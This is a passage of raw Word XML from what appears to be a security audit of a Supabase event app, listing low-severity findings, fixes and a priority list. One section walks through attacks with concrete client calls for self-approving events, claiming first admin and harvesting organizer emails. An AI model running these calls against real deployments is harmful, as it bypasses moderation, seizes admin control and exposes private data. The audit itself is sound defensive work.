        <w:t xml:space="preserve">admin_list_users() in phase4 hides disabled users from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phase4_messaging_contact_admin_helpers.sql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189</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CWE-840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phase4 version of admin_list_users() has a WHERE clause that filters out disabled users, so an admin who just deactivated someone cannot see them in the panel anymore. This is a logic bug. It is fixed in phase6_2 which removes the filter.</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Admin cannot see or manage disabled user accounts after deactivating them.</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Already fixed in phase6_2. Just make sure phase6_2 is applied after phase4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E5E7EB" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="DCFCE7" w:val="clear"/>
        <w:spacing w:before="180" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  F-14  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[LOW]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">admin_set_user_admin() in phase4 fails if user profile row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phase4_messaging_contact_admin_helpers.sql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215–218</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CWE-754</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phase4 version checks the public.profiles table to find the target user. But if the trigger that creates a profile row on sign-up ever failed, that user has no profile row and the admin function returns "Target user not found" even though the user exists in auth.users. Fixed in phase6_3.</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Admin cannot manage a user whose profile row is missing.</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Already fixed in phase6_3 which checks auth.users instead and uses UPSERT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E5E7EB" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="DCFCE7" w:val="clear"/>
        <w:spacing w:before="180" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  F-15  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[LOW]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">is_admin() helper function does not have an explicit NULL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phase1_relational_schema.sql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97–107</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CWE-476</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is_admin() function runs WHERE p.id = uid. When uid is NULL (for anonymous users), SQL evaluates p.id = NULL as false — so it correctly returns false. This works right now, but it relies on implicit SQL NULL behavior rather than an explicit check. If someone edits the function in future without understanding this, it could break.</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Currently safe. Potential future bug if function is modified.</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an explicit guard at the top of the function:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">IF uid IS NULL THEN RETURN false; END IF;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E5E7EB" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="DCFCE7" w:val="clear"/>
        <w:spacing w:before="180" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  F-16  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[LOW]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phone numbers are stored with no format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 + phase6_4</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phase4 L458 / phase6_4 L28</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CWE-20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sender_phone_param field accepts any string — there is no validation on format. Someone could put "hello world" or a 1000-character string in the phone field and it gets saved to the database.</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Garbage data in the database. Risk if phone numbers are ever passed to an SMS service.</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Add a simple format check:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">IF sender_phone_param IS NOT NULL AND sender_phone_param !~ '^[+\d\s\-()]{7,20}$'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">THEN RAISE EXCEPTION 'Invalid phone number';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">END IF;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E5E7EB" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="DCFCE7" w:val="clear"/>
        <w:spacing w:before="180" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  F-17  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[LOW]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Seed data uses hardcoded UUIDs that are public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phase5_relational_seed_events.sql</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31, 67, 92, 117</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CWE-330</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phase5 inserts 4 demo events with hardcoded UUIDs (e.g. f03ce3d1-33eb-4e15-bdd7-6f920b7e7630). Since these are in the public GitHub repo, anyone reading the code knows the exact IDs of seed events before even visiting the app. This lets them skip enumeration and go straight to targeting those specific event IDs.</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Low risk on its own, but attackers can go straight to sending contact messages or RSVPs to known event IDs.</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Use gen_random_uuid() instead of hardcoded UUIDs. Also add a comment saying phase5 is for development only and should never run in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E5E7EB" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F9FAFB" w:val="clear"/>
        <w:spacing w:before="180" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  F-18  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[INFO]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Old deprecated server code still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File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supabase/functions/deprecated/server/</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Line(s)</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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-561</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What I Found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The README mentions that old Edge/KV server code was removed and put in supabase/functions/deprecated/. This code is not used anymore but it is still sitting in the repo. It could confuse developers into accidentally connecting new features to it, and it gives attackers extra information about the old architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Minimal right now. Risk if someone accidentally re-uses it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Fix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Just delete the deprecated/ folder. If you need to keep it for reference, make a note in the README about which git tag has the last version of it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="340" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Attack Scenarios</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Here I walk through the most serious issues as full attack scenarios — as if I was an actual attacker trying to exploit the app. I traced each step through the real source code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 1: Self-approving an event (F-01) — Critical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is probably the most damaging thing a regular user can do. It completely bypasses the moderation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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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What Happens</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Register</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Sign up for a regular user account. No special access needed.</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Create Event</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Submit a new event through the app. It gets status = "pending" and waits for admin approval.</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Self-Approve</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Open browser devtools console. Run:
supabase.from("events").update({ status: "approved" }).eq("id", "YOUR_EVENT_ID")
The RLS WITH CHECK only checks you own the event — it does. The update goes through.</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Result</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Your event is now approved and publicly visible. No admin ever saw it.</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Abuse</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Publish scam event pages, misinformation, fake ticket links — anything. All without review.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 2: Taking admin before the real admin does (F-02) — High</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This requires good timing but the README basically tells you how to do it.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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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What Happens</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Read README</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Open the public GitHub README. It says: "Ensure your account has admin status via claim_first_admin". Now you know the function name.</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Register First</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Sign up for an account before the developer gets around to setting themselves as admin. On a fresh deployment this window can be open for hours.</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Claim Admin</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Run: supabase.rpc("claim_first_admin")
Response: { success: true, message: "Admin claim successful" }</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Lock In</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Promote a second account you control: supabase.rpc("admin_set_user_admin", { target_user_id: "...", make_admin: true })
Now you have two admin accounts. The real developer is locked out of admin features.</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Full Control</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Approve or reject any events, deactivate any users, read all contact messages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 3: Harvesting organizer email addresses (F-03) — High</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a privacy issue that lets you collect personal emails without the organizers knowing.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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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What Happens</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Get Event IDs</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Query approved events: supabase.from("events").select("id").eq("status","approved")
You get a list of all approved event IDs.</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Send Messages</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For each event ID, call create_contact_message(). You just need a valid account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Read Emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Now query your sent messages: supabase.from("messages").select("organizer_email")
You get back the personal email of every organizer you messaged. These were never shown in the UI.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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f2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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You now have a list of private organizer email addresses. Could be used for spam or phishing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="340" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Things That Were Done Well</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I want to be fair — there is quite a lot that was done right in this codebase, especially in the database security layer. Here is what I thought was good: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What</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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Why It's Good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RLS enabled on every table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All 7 tables have Row Level Security enabled. Nothing is accidentally left open to the public.</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Admin check in every admin function</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Every single admin_* function starts with "if not is_admin(caller_id) then return error". Very consistent — no function accidentally skips the check.</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Column-level restrictions on profiles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In phase2 the developer revoked UPDATE and INSERT on the profiles table and only re-granted access to safe columns (id, email). This means users cannot change their own is_admin flag directly.</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Profile update policy prevents self-escalation</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The WITH CHECK clause in phase2 checks that is_admin stays the same value after an update. So even if someone tries to trick it, the policy blocks the escalation.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Race condition prevention in claim_first_admin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pg_advisory_xact_lock is used to prevent two users claiming admin at exactly the same time. This was a thoughtful security addition.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Row locking in send_contact_reply</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SELECT ... FOR UPDATE is used when replying to a message, which prevents two replies corrupting the JSONB array if sent at the same time.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All functions set search_path explicitly</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Every SECURITY DEFINER function sets search_path = public. This prevents a class of attack called schema injection.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Grant lockdown in phase6_1</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REVOKE ALL is called on every sensitive function before re-granting. This means even if something was accidentally granted earlier, phase6_1 cleans it up.</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Users cannot insert messages directly</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The messages_insert_admin_only RLS policy means users must go through the create_contact_message() RPC. They cannot forge raw message rows.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Soft delete is per-user</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The message_user_state table handles soft deletes separately for each user. If one user deletes a message, the other participant's copy is not affected.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Last admin protection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The code correctly prevents removing the last admin — both admin_set_user_admin and admin_deactivate_user check if there would be zero admins left.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bCs/>
                <w:color w:val="16A34A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">No secrets committed to git</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.gitignore correctly excludes all .env files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="340" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Fix Priority List</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If I were the developer, this is the order I would fix things in:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix right away (before going live)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-01 — Restrict who can change the status column on events. One REVOKE statement fixes this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-02 — Remove or harden the claim_first_admin() function. Seed the first admin in the migration instead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-03 — Stop storing organizer_email in the messages table.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-04 — Add an approved status check in create_contact_message().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-05 — Add a Content Security Policy header at the hosting level.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
